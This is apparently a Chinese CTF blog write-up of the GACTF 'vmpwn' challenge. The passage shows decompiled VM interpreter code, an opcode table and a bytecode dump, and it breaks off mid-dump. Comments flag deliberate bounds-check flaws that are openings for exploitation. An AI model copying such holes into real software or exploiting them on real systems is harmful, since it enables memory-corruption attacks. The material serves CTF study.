0x00 前言

CUMTCTF2020 出了一次题,第一次站在出题人角度看ctf比赛,

收获颇多,体会到了出题人的辛苦,不过还好没出什么大问题

0x01 gactf vmpwn

第一次做vmpwn,模拟栈的程序,分析还挺麻烦,看了很久很久甚至不想写这篇博客…虚拟栈嘛肯定要用到逆向的知识

总的思想malloc三块内存,分别存放寄存器、数据、指令

源程序做了一点注释,没写完,好累,下面把所有指令整理成了指令集

/*
 * Decompiled VM interpreter of the vmpwn challenge (IDA pseudocode, as shown
 * on the page; the IDA types and helper names are kept verbatim).
 *
 * v33 is a 6-qword register file from calloc(0x30):
 *   v33[0..2] general registers (the page calls them rax/rbx/rcx, the
 *             listing further down a0/a1/a2), v33[3] the VM stack pointer,
 *             v33[5] the VM program counter; v33[4] is never touched here.
 * v34 is the 0x1000-byte data area and v35 the 0x2000-byte VM stack; the
 * stack pointer starts at v35 + 0x1E00 and push/pop move it downward/upward.
 * Operand encoding seen below: immediates and data offsets are 8 bytes,
 * JMP_NEAR (0x7E) and CALL_NEAR (0x88) carry a signed 16-bit displacement
 * applied after the operand has been consumed, SYSCALL (0x8F) a 1-byte index.
 *
 * sub_AC0() receives an error message and the decompiled code does not branch
 * around the statements that follow it, so it presumably does not return —
 * TODO confirm against the binary.
 */
__int64 __fastcall main(__int64 a1, char **a2, char **a3)
{
  unsigned __int8 *v3; // rax
  _QWORD *v4; // rax
  _QWORD *v5; // rax
  _QWORD *v6; // rax
  int v7; // ST0C_4
  int v8; // ST0C_4
  int v9; // ST0C_4
  int v10; // ST0C_4
  int v11; // ST0C_4
  int v12; // ST0C_4
  int v13; // ST0C_4
  int v14; // ST0C_4
  int v15; // ST0C_4
  int v16; // ST0C_4
  int v17; // ST0C_4
  int v18; // ST0C_4
  int v19; // ST0C_4
  int v20; // ST0C_4
  int v21; // ST0C_4
  int v22; // ST0C_4
  int v23; // ST0C_4
  _QWORD *v24; // rax
  __int64 result; // rax
  signed int v26; // [rsp+Ch] [rbp-24h]
  signed int v27; // [rsp+Ch] [rbp-24h]
  signed int v28; // [rsp+Ch] [rbp-24h]
  signed int v29; // [rsp+Ch] [rbp-24h]
  signed int v30; // [rsp+Ch] [rbp-24h]
  signed int v31; // [rsp+Ch] [rbp-24h]
  signed int v32; // [rsp+Ch] [rbp-24h]
  _QWORD *v33; // [rsp+10h] [rbp-20h]
  char *v34; // [rsp+18h] [rbp-18h]
  char *v35; // [rsp+20h] [rbp-10h]

  sub_BA0(); // setup routine; its body is not shown on the page
  v33 = calloc(0x30uLL, 1uLL); // register file. NOTE(review): not NULL-checked, unlike v34/v35 below
  v34 = (char *)calloc(0x1000uLL, 1uLL); // .data
  v35 = (char *)calloc(0x2000uLL, 1uLL); // VM stack area
  v33[3] = v35 + 0x1E00; // rsp
  v33[5] = &unk_203020; // op code
  if ( !v34 || !v35 )
    sub_AC0((__int64)"out of memory");
  while ( 1 )
  {
    v3 = (unsigned __int8 *)v33[5];
    v33[5] = v3 + 1; // pc
    // IDA prints the jump-table symbol as the switch operand; the default
    // case reports *v3, so the dispatch is presumably on the opcode byte *v3.
    switch ( (unsigned int)off_1880 )
    {
      case 0x10u:
        *v33 = v33[3]; // mov rax,rsp
        break;
      case 0x11u:
        *v33 = *(_QWORD *)v33[5]; // mov rax,i
        v33[5] += 8LL;
        break;
      case 0x12u:
        v33[1] = *(_QWORD *)v33[5]; // mov rbx,i
        v33[5] += 8LL;
        break;
      case 0x13u:
        v33[2] = *(_QWORD *)v33[5]; // mov rcx,i
        v33[5] += 8LL;
        break;
      case 0x20u:
        // The 8-byte operand is truncated to a 32-bit signed index (v26..v32)
        // before the range check; this applies to every 0x2x/0x3x case.
        v26 = *(_QWORD *)v33[5];
        if ( v26 < 0 || v26 > 0xFFF )
          sub_AC0((__int64)"buffer overflow detected");
        *v33 = &v34[v26]; // mov rax,&data[x]
        v33[5] += 8LL;
        break;
      case 0x21u:
        v27 = *(_QWORD *)v33[5];
        // NOTE(review): the check bounds the index, not the access: indices
        // 0xFF9..0xFFF pass and the 8-byte load/store below (likewise in
        // cases 0x22, 0x23, 0x33, 0x34, 0x35) then crosses the end of the
        // 0x1000-byte data area. Comparing against 0xFF8 would bound the access width.
        if ( v27 < 0 || v27 > 4095 )
          sub_AC0((__int64)"buffer overflow detected");
        *v33 = *(_QWORD *)&v34[v27]; // mov rax,data[x]
        v33[5] += 8LL;
        break;
      case 0x22u:
        v28 = *(_QWORD *)v33[5];
        if ( v28 < 0 || v28 > 0xFFF )
          sub_AC0((__int64)"buffer overflow detected");
        v33[1] = *(_QWORD *)&v34[v28]; // mov rbx,data[x]
        v33[5] += 8LL;
        break;
      case 0x23u:
        v29 = *(_QWORD *)v33[5];
        if ( v29 < 0 || v29 > 4095 )
          sub_AC0((__int64)"buffer overflow detected");
        v33[2] = *(_QWORD *)&v34[v29]; // mov rcx,data[x]
        v33[5] += 8LL;
        break;
      case 0x33u:
        v30 = *(_QWORD *)v33[5];
        if ( v30 < 0 || v30 > 4095 )
          sub_AC0((__int64)"buffer overflow detected");
        *(_QWORD *)&v34[v30] = *v33; // mov data[x],rax
        v33[5] += 8LL;
        break;
      case 0x34u:
        v31 = *(_QWORD *)v33[5];
        if ( v31 < 0 || v31 > 4095 )
          sub_AC0((__int64)"buffer overflow detected");
        *(_QWORD *)&v34[v31] = v33[1]; // mov data[x],rbx
        v33[5] += 8LL;
        break;
      case 0x35u:
        v32 = *(_QWORD *)v33[5];
        if ( v32 < 0 || v32 > 4095 )
          sub_AC0((__int64)"buffer overflow detected");
        *(_QWORD *)&v34[v32] = v33[2]; // mov data[x],rcx
        v33[5] += 8LL;
        break;
      case 0x44u:
        // push: refuse when the decrement would reach the bottom of the stack area
        if ( v33[3] - (_QWORD)v35 <= 8LL )
          sub_AC0((__int64)"stack underflow detected");
        v33[3] -= 8LL;
        *(_QWORD *)v33[3] = *v33; // push rax
        break;
      case 0x45u:
        if ( v33[3] - (_QWORD)v35 <= 8LL )
          sub_AC0((__int64)"stack underflow detected");
        v33[3] -= 8LL;
        *(_QWORD *)v33[3] = v33[1]; // push rbx
        break;
      case 0x46u:
        if ( v33[3] - (_QWORD)v35 <= 8LL )
          sub_AC0((__int64)"stack underflow detected");
        v33[3] -= 8LL;
        *(_QWORD *)v33[3] = v33[2]; // push rcx
        break;
      case 0x51u:
        // pop: refuse once rsp is at or beyond its initial position (base + 0x1E00)
        if ( v33[3] - (_QWORD)v35 > 0x1DFFLL )
          sub_AC0((__int64)"stack overflow detected");
        v4 = (_QWORD *)v33[3];
        v33[3] = v4 + 1;
        *v33 = *v4; // pop rax
        break;
      case 0x52u:
        if ( v33[3] - (_QWORD)v35 > 7679LL )
          sub_AC0((__int64)"stack overflow detected");
        v5 = (_QWORD *)v33[3];
        v33[3] = v5 + 1;
        v33[1] = *v5; // pop rbx
        break;
      case 0x53u:
        if ( v33[3] - (_QWORD)v35 > 7679LL )
          sub_AC0((__int64)"stack overflow detected");
        v6 = (_QWORD *)v33[3];
        v33[3] = v6 + 1;
        v33[2] = *v6; // pop rcx
        break;
      case 0x61u:
        // Arithmetic immediates (v7..v20) are read as 8 bytes but truncated
        // to int before being applied to the 64-bit register.
        v7 = *(_QWORD *)v33[5];
        v33[5] += 8LL;
        *v33 += v7; // add rax,i
        break;
      case 0x62u:
        v8 = *(_QWORD *)v33[5];
        v33[5] += 8LL;
        v33[1] += v8; // add rbx,i
        break;
      case 0x63u:
        v9 = *(_QWORD *)v33[5];
        v33[5] += 8LL;
        v33[2] += v9; // add rcx,i
        break;
      case 0x64u:
        v12 = *(_QWORD *)v33[5];
        v33[5] += 8LL;
        *v33 -= v12; // sub rax,i
        break;
      case 0x65u:
        v13 = *(_QWORD *)v33[5];
        v33[5] += 8LL;
        v33[1] -= v13; // sub rbx,i
        break;
      case 0x66u:
        v14 = *(_QWORD *)v33[5];
        v33[5] += 8LL;
        v33[2] -= v14; // sub rcx,i
        break;
      case 0x67u:
        v15 = *(_QWORD *)v33[5];
        v33[5] += 8LL;
        *v33 *= v15; // mul rax,i
        break;
      case 0x68u:
        v16 = *(_QWORD *)v33[5];
        v33[5] += 8LL;
        v33[1] *= v16; // mul rbx,i
        break;
      case 0x69u:
        v17 = *(_QWORD *)v33[5];
        v33[5] += 8LL;
        v33[2] *= v17; // mul rcx,i
        break;
      case 0x6Au:
        v18 = *(_QWORD *)v33[5];
        v33[5] += 8LL;
        *v33 ^= v18; // xor rax,i
        break;
      case 0x6Bu:
        v19 = *(_QWORD *)v33[5];
        v33[5] += 8LL;
        v33[1] ^= v19; // xor rbx,i
        break;
      case 0x6Cu:
        v20 = *(_QWORD *)v33[5];
        v33[5] += 8LL;
        v33[2] ^= v20; // xor rcx,i
        break;
      case 0x6Du:
        *v33 = 0LL; // xor rax,rax
        break;
      case 0x6Eu:
        v33[1] = 0LL; // xor rbx,rbx
        break;
      case 0x6Fu:
        v33[2] = 0LL; // xor rcx,rcx
        break;
      case 0x7Eu:
        // jmp near: signed 16-bit displacement, relative to the pc after the operand
        v22 = *(signed __int16 *)v33[5];
        v33[5] += 2LL;
        v33[5] += v22;
        break;
      case 0x7Fu:
        v33[5] = *v33; // jmp rax
        break;
      case 0x80u:
        // call rax: the return pc is stored at rsp + 8, i.e. the call "stack"
        // grows upward (the page notes this); unlike push/pop there is no
        // range check on the rsp adjustment here, in 0x88, or in 0x90.
        v33[3] += 8LL;
        *(_QWORD *)v33[3] = v33[5];
        v33[5] = *v33;
        break;
      case 0x81u:
        v10 = *(_QWORD *)v33[5];
        v33[5] += 8LL;
        v33[3] += 8LL * (v10 / 8); // add rsp,i (rounded down to a multiple of 8)
        break;
      case 0x82u:
        v11 = *(_QWORD *)v33[5];
        v33[5] += 8LL;
        v33[3] += -8LL * (v11 / 8); // sub rsp,i (rounded down to a multiple of 8)
        break;
      case 0x88u:
        // call near: signed 16-bit displacement; return pc saved at rsp + 8 as in 0x80
        v23 = *(signed __int16 *)v33[5];
        v33[5] += 2LL;
        v33[3] += 8LL;
        *(_QWORD *)v33[3] = v33[5];
        v33[5] += v23;
        break;
      case 0x8Fu:
        // "syscall": 1-byte index into the function-pointer table off_2038E0,
        // called with the three general registers as arguments. No range check
        // on the index is visible here; the table size is not shown on the page.
        v21 = *(unsigned __int8 *)v33[5]++;
        ((void (__fastcall *)(_QWORD, _QWORD, _QWORD))*(&off_2038E0 + v21))(*v33, v33[1], v33[2]);
        break;
      case 0x90u:
        // leave/ret: pc = [rsp], then rsp -= 8 (mirror of 0x80/0x88)
        v24 = (_QWORD *)v33[3];
        v33[3] = v24 - 1;
        v33[5] = *v24;
        break;
      case 0xFFu:
        return 0LL; // exit
      default:
        printf(":%d\n", *v3); // report the unknown opcode byte
        sub_AC0((__int64)"Illegal Instrumention");
        return result; // result is never assigned — decompiler artifact, unreachable if sub_AC0 does not return
    }
  }
}

理解程序写出指令集

// Simulated system-call table (the author's label) — in effect the VM's opcode
// table, reconstructed from the switch in main() above.
// Operand encoding as implemented by main(): the *_I opcodes take an 8-byte
// immediate, the *_MEM* opcodes an 8-byte offset into the data area (checked
// against 0xFFF), JMP_NEAR/CALL_NEAR a signed 16-bit displacement applied
// after the operand has been consumed, SYSCALL a 1-byte table index; the
// remaining opcodes take no operand. ADD_RSP_I/SUB_RSP_I round the immediate
// down to a multiple of 8. The arithmetic immediates are truncated to int.
//mov rax,rsp
#define MOV_RAX_RSP 0x10
//mov rax,immediate_value
#define MOV_RAX_I 0x11
//mov rbx,immediate_value
#define MOV_RBX_I 0x12
//mov rcx,immediate_value
#define MOV_RCX_I 0x13
//mov rax,&data_mem[x]
#define MOV_RAX_MEM_ADDR 0x20
//mov rax,data_mem[x]
#define MOV_RAX_MEM 0x21
//mov rbx,data_mem[x]
#define MOV_RBX_MEM 0x22
//mov rcx,data_mem[x]
#define MOV_RCX_MEM 0x23
//mov data_mem[x],rax
#define MOV_MEM_RAX 0x33
//mov data_mem[x],rbx
#define MOV_MEM_RBX 0x34
//mov data_mem[x],rcx
#define MOV_MEM_RCX 0x35
//push rax
#define PUSH_RAX 0x44
//push rbx
#define PUSH_RBX 0x45
//push rcx
#define PUSH_RCX 0x46
//pop rax
#define POP_RAX 0x51
//pop rbx
#define POP_RBX 0x52
//pop rcx
#define POP_RCX 0x53
//add rax,immediate_value
#define ADD_RAX_I 0x61
//add rbx,immediate_value
#define ADD_RBX_I 0x62
//add rcx,immediate_value
#define ADD_RCX_I 0x63
//sub rax,immediate_value
#define SUB_RAX_I 0x64
//sub rbx,immediate_value
#define SUB_RBX_I 0x65
//sub rcx,immediate_value
#define SUB_RCX_I 0x66
//mul rax,immediate_value
#define MUL_RAX_I 0x67
//mul rbx,immediate_value
#define MUL_RBX_I 0x68
//mul rcx,immediate_value
#define MUL_RCX_I 0x69
//xor rax,immediate_value
#define XOR_RAX_I 0x6A
//xor rbx,immediate_value
#define XOR_RBX_I 0x6B
//xor rcx,immediate_value
#define XOR_RCX_I 0x6C
//xor rax,rax
#define ZERO_RAX 0x6D
//xor rbx,rbx
#define ZERO_RBX 0x6E
//xor rcx,rcx
#define ZERO_RCX 0x6F
//syscall (1-byte index follows)
#define SYSCALL 0x8F
//jmp $+disp16 (signed 16-bit displacement)
#define JMP_NEAR 0x7E
//jmp rax
#define JMP_RAX 0x7F
//call rax (return pc stored at rsp+8)
#define CALL_RAX 0x80
//call near (signed 16-bit displacement, return pc stored at rsp+8)
#define CALL_NEAR 0x88
//leave (pc = [rsp], rsp -= 8)
#define LEAVE 0x90
//exit
#define EXIT 0xFF
//add rsp,immediate_value
#define ADD_RSP_I 0x81
//sub rsp,immediate_value
#define SUB_RSP_I 0x82

dump出代码段数据:

// Code segment data: the VM bytecode dumped from the binary (2109 bytes).
// Presumably the bytes at unk_203020 that main() starts executing — confirm
// against the binary. The first instruction, 0x7E 0xA5 0x03, is JMP_NEAR with
// displacement +0x3A5; the dump ends with 0x88 0xD2 0xF7 (CALL_NEAR with a
// negative displacement) followed by zero padding. The hand-written
// disassembly of this blob follows further down the page.
unsigned char ida_chars[] =
{
  0x7E, 0xA5, 0x03, 0x82, 0x00, 0x01, 0x00, 0x00, 0x00, 0x00,
  0x00, 0x00, 0x11, 0x23, 0x23, 0x23, 0x23, 0x23, 0x23, 0x23,
  0x23, 0x33, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
  0x11, 0x23, 0x23, 0x23, 0x23, 0x23, 0x23, 0x23, 0x23, 0x33,
  0x08, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x11, 0x23,
  0x23, 0x23, 0x23, 0x23, 0x23, 0x23, 0x23, 0x33, 0x10, 0x00,
  0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x11, 0x23, 0x23, 0x23,
  0x23, 0x23, 0x23, 0x23, 0x23, 0x33, 0x18, 0x00, 0x00, 0x00,
  0x00, 0x00, 0x00, 0x00, 0x11, 0x23, 0x23, 0x23, 0x23, 0x23,
  0x23, 0x23, 0x23, 0x33, 0x20, 0x00, 0x00, 0x00, 0x00, 0x00,
  0x00, 0x00, 0x11, 0x0A, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
  0x00, 0x33, 0x28, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
  0x20, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x44,
  0x52, 0x11, 0x01, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
  0x13, 0x29, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x8F,
  0x01, 0x11, 0x23, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20,
  0x33, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x11,
  0x20, 0x20, 0x77, 0x65, 0x6C, 0x63, 0x6F, 0x6D, 0x33, 0x08,
  0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x11, 0x65, 0x20,
  0x74, 0x6F, 0x20, 0x32, 0x30, 0x32, 0x33, 0x10, 0x00, 0x00,
  0x00, 0x00, 0x00, 0x00, 0x00, 0x11, 0x30, 0x20, 0x47, 0x41,
  0x43, 0x54, 0x46, 0x20, 0x33, 0x18, 0x00, 0x00, 0x00, 0x00,
  0x00, 0x00, 0x00, 0x11, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20,
  0x20, 0x23, 0x33, 0x20, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
  0x00, 0x11, 0x0A, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
  0x33, 0x28, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x20,
  0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x44, 0x52,
  0x11, 0x01, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x13,
  0x29, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x8F, 0x01,
  0x11, 0x23, 0x20, 0x20, 0x20, 0x74, 0x68, 0x69, 0x73, 0x33,
  0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x11, 0x20,
  0x69, 0x73, 0x20, 0x61, 0x20, 0x6D, 0x65, 0x33, 0x08, 0x00,
  0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x11, 0x73, 0x73, 0x61,
  0x67, 0x65, 0x20, 0x66, 0x72, 0x33, 0x10, 0x00, 0x00, 0x00,
  0x00, 0x00, 0x00, 0x00, 0x11, 0x6F, 0x6D, 0x20, 0x76, 0x6D,
  0x20, 0x6D, 0x61, 0x33, 0x18, 0x00, 0x00, 0x00, 0x00, 0x00,
  0x00, 0x00, 0x11, 0x63, 0x68, 0x69, 0x6E, 0x65, 0x20, 0x20,
  0x23, 0x33, 0x20, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
  0x11, 0x0A, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x33,
  0x28, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x20, 0x00,
  0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x44, 0x52, 0x11,
  0x01, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x13, 0x29,
  0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x8F, 0x01, 0x11,
  0x23, 0x23, 0x23, 0x23, 0x23, 0x23, 0x23, 0x23, 0x33, 0x00,
  0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x11, 0x23, 0x23,
  0x23, 0x23, 0x23, 0x23, 0x23, 0x23, 0x33, 0x08, 0x00, 0x00,
  0x00, 0x00, 0x00, 0x00, 0x00, 0x11, 0x23, 0x23, 0x23, 0x23,
  0x23, 0x23, 0x23, 0x23, 0x33, 0x10, 0x00, 0x00, 0x00, 0x00,
  0x00, 0x00, 0x00, 0x11, 0x23, 0x23, 0x23, 0x23, 0x23, 0x23,
  0x23, 0x23, 0x33, 0x18, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
  0x00, 0x11, 0x23, 0x23, 0x23, 0x23, 0x23, 0x23, 0x23, 0x23,
  0x33, 0x20, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x11,
  0x0A, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x33, 0x28,
  0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x20, 0x00, 0x00,
  0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x44, 0x52, 0x11, 0x01,
  0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x13, 0x29, 0x00,
  0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x8F, 0x01, 0x11, 0x23,
  0x74, 0x65, 0x6C, 0x6C, 0x20, 0x6D, 0x65, 0x33, 0x00, 0x00,
  0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x11, 0x20, 0x77, 0x68,
  0x61, 0x74, 0x20, 0x69, 0x73, 0x33, 0x08, 0x00, 0x00, 0x00,
  0x00, 0x00, 0x00, 0x00, 0x11, 0x20, 0x79, 0x6F, 0x75, 0x72,
  0x20, 0x6E, 0x61, 0x33, 0x10, 0x00, 0x00, 0x00, 0x00, 0x00,
  0x00, 0x00, 0x11, 0x6D, 0x65, 0x3A, 0x00, 0x00, 0x00, 0x00,
  0x00, 0x33, 0x18, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
  0x20, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x44,
  0x52, 0x11, 0x01, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
  0x13, 0x1B, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x8F,
  0x01, 0x10, 0x44, 0x52, 0x11, 0x00, 0x00, 0x00, 0x00, 0x00,
  0x00, 0x00, 0x00, 0x13, 0x00, 0x10, 0x00, 0x00, 0x00, 0x00,
  0x00, 0x00, 0x8F, 0x00, 0x10, 0x8F, 0x02, 0x11, 0x6F, 0x6B,
  0x2C, 0x77, 0x68, 0x61, 0x74, 0x20, 0x33, 0x00, 0x00, 0x00,
  0x00, 0x00, 0x00, 0x00, 0x00, 0x11, 0x64, 0x6F, 0x20, 0x79,
  0x6F, 0x75, 0x20, 0x77, 0x33, 0x08, 0x00, 0x00, 0x00, 0x00,
  0x00, 0x00, 0x00, 0x11, 0x61, 0x6E, 0x74, 0x20, 0x74, 0x6F,
  0x20, 0x73, 0x33, 0x10, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
  0x00, 0x11, 0x61, 0x79, 0x3A, 0x00, 0x00, 0x00, 0x00, 0x00,
  0x33, 0x18, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x20,
  0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x44, 0x52,
  0x11, 0x01, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x13,
  0x1B, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x8F, 0x01,
  0x10, 0x44, 0x52, 0x11, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
  0x00, 0x00, 0x13, 0x00, 0x10, 0x00, 0x00, 0x00, 0x00, 0x00,
  0x00, 0x8F, 0x00, 0x11, 0x4E, 0x6F, 0x77, 0x2C, 0x49, 0x20,
  0x72, 0x65, 0x33, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
  0x00, 0x11, 0x63, 0x65, 0x76, 0x69, 0x65, 0x20, 0x79, 0x6F,
  0x33, 0x08, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x11,
  0x75, 0x72, 0x20, 0x6D, 0x65, 0x73, 0x73, 0x61, 0x33, 0x10,
  0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x11, 0x67, 0x65,
  0x2C, 0x62, 0x79, 0x65, 0x7E, 0x0A, 0x33, 0x18, 0x00, 0x00,
  0x00, 0x00, 0x00, 0x00, 0x00, 0x20, 0x00, 0x00, 0x00, 0x00,
  0x00, 0x00, 0x00, 0x00, 0x44, 0x52, 0x11, 0x01, 0x00, 0x00,
  0x00, 0x00, 0x00, 0x00, 0x00, 0x13, 0x20, 0x00, 0x00, 0x00,
  0x00, 0x00, 0x00, 0x00, 0x8F, 0x01, 0x81, 0x00, 0x01, 0x00,
  0x00, 0x00, 0x00, 0x00, 0x00, 0x90, 0x11, 0x20, 0x5F, 0x5F,
  0x5F, 0x5F, 0x5F, 0x20, 0x20, 0x33, 0x00, 0x00, 0x00, 0x00,
  0x00, 0x00, 0x00, 0x00, 0x11, 0x20, 0x20, 0x20, 0x20, 0x20,
  0x5F, 0x5F, 0x5F, 0x33, 0x08, 0x00, 0x00, 0x00, 0x00, 0x00,
  0x00, 0x00, 0x11, 0x20, 0x20, 0x20, 0x5F, 0x5F, 0x5F, 0x5F,
  0x5F, 0x33, 0x10, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
  0x11, 0x20, 0x20, 0x20, 0x5F, 0x5F, 0x5F, 0x5F, 0x5F, 0x33,
  0x18, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x11, 0x20,
  0x20, 0x20, 0x5F, 0x5F, 0x5F, 0x5F, 0x5F, 0x33, 0x20, 0x00,
  0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x11, 0x20, 0x20, 0x20,
  0x20, 0x20, 0x20, 0x20, 0x20, 0x33, 0x28, 0x00, 0x00, 0x00,
  0x00, 0x00, 0x00, 0x00, 0x11, 0x5F, 0x20, 0x20, 0x20, 0x20,
  0x20, 0x5F, 0x20, 0x33, 0x30, 0x00, 0x00, 0x00, 0x00, 0x00,
  0x00, 0x00, 0x11, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x5F,
  0x5F, 0x33, 0x38, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
  0x11, 0x5F, 0x20, 0x20, 0x5F, 0x5F, 0x5F, 0x0A, 0x00, 0x33,
  0x40, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x20, 0x00,
  0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x44, 0x52, 0x11,
  0x01, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x13, 0x47,
  0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x8F, 0x01, 0x11,
  0x2F, 0x20, 0x20, 0x5F, 0x5F, 0x5F, 0x7C, 0x20, 0x33, 0x00,
  0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x11, 0x20, 0x20,
  0x20, 0x20, 0x2F, 0x20, 0x20, 0x20, 0x33, 0x08, 0x00, 0x00,
  0x00, 0x00, 0x00, 0x00, 0x00, 0x11, 0x7C, 0x20, 0x2F, 0x20,
  0x20, 0x5F, 0x5F, 0x5F, 0x33, 0x10, 0x00, 0x00, 0x00, 0x00,
  0x00, 0x00, 0x00, 0x11, 0x7C, 0x20, 0x7C, 0x5F, 0x20, 0x20,
  0x20, 0x5F, 0x33, 0x18, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
  0x00, 0x11, 0x7C, 0x20, 0x7C, 0x20, 0x20, 0x5F, 0x5F, 0x5F,
  0x33, 0x20, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x11,
  0x7C, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x7C, 0x33, 0x28,
  0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x11, 0x20, 0x7C,
  0x20, 0x20, 0x20, 0x2F, 0x20, 0x2F, 0x33, 0x30, 0x00, 0x00,
  0x00, 0x00, 0x00, 0x00, 0x00, 0x11, 0x20, 0x20, 0x20, 0x20,
  0x20, 0x2F, 0x20, 0x20, 0x33, 0x38, 0x00, 0x00, 0x00, 0x00,
  0x00, 0x00, 0x00, 0x11, 0x20, 0x7C, 0x2F, 0x20, 0x20, 0x20,
  0x7C, 0x0A, 0x33, 0x40, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
  0x00, 0x20, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
  0x44, 0x52, 0x11, 0x01, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
  0x00, 0x13, 0x48, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
  0x8F, 0x01, 0x11, 0x7C, 0x20, 0x7C, 0x20, 0x20, 0x20, 0x20,
  0x20, 0x33, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
  0x11, 0x20, 0x20, 0x20, 0x2F, 0x20, 0x2F, 0x7C, 0x20, 0x33,
  0x08, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x11, 0x7C,
  0x20, 0x7C, 0x20, 0x7C, 0x20, 0x20, 0x20, 0x33, 0x10, 0x00,
  0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x11, 0x20, 0x20, 0x20,
  0x20, 0x7C, 0x20, 0x7C, 0x20, 0x33, 0x18, 0x00, 0x00, 0x00,
  0x00, 0x00, 0x00, 0x00, 0x11, 0x20, 0x20, 0x7C, 0x20, 0x7C,
  0x5F, 0x5F, 0x20, 0x33, 0x20, 0x00, 0x00, 0x00, 0x00, 0x00,
  0x00, 0x00, 0x11, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20,
  0x7C, 0x33, 0x28, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
  0x11, 0x20, 0x7C, 0x20, 0x20, 0x2F, 0x20, 0x2F, 0x20, 0x33,
  0x30, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x11, 0x20,
  0x20, 0x20, 0x20, 0x2F, 0x20, 0x2F, 0x7C, 0x33, 0x38, 0x00,
  0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x11, 0x20, 0x20, 0x20,
  0x2F, 0x7C, 0x20, 0x7C, 0x0A, 0x33, 0x40, 0x00, 0x00, 0x00,
  0x00, 0x00, 0x00, 0x00, 0x20, 0x00, 0x00, 0x00, 0x00, 0x00,
  0x00, 0x00, 0x00, 0x44, 0x52, 0x11, 0x01, 0x00, 0x00, 0x00,
  0x00, 0x00, 0x00, 0x00, 0x13, 0x48, 0x00, 0x00, 0x00, 0x00,
  0x00, 0x00, 0x00, 0x8F, 0x01, 0x11, 0x7C, 0x20, 0x7C, 0x20,
